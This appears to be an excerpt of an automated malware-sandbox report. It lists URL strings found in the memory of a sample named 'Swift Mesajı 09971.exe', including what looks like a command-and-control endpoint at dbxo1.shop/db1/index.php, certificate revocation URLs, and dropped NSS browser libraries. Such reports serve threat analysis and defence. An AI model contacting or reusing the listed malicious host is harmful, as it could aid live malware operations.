Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7911321206.0000000001875000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr, nssdbm3.dll.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr, nssdbm3.dll.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/db1/index.php
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/db1/index.phpC
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/db1/index.phpft
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8078319161.000000001D460000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/db1/index.phpl
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/db1/index.phpp
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dbxo1.shop/nr
Source: Swift Mesaj#U0131#09971.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr, nssdbm3.dll.4.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr String found in binary or memory: http://ocsp.thawte.com0
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8002183781.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011167801.000000001D498000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
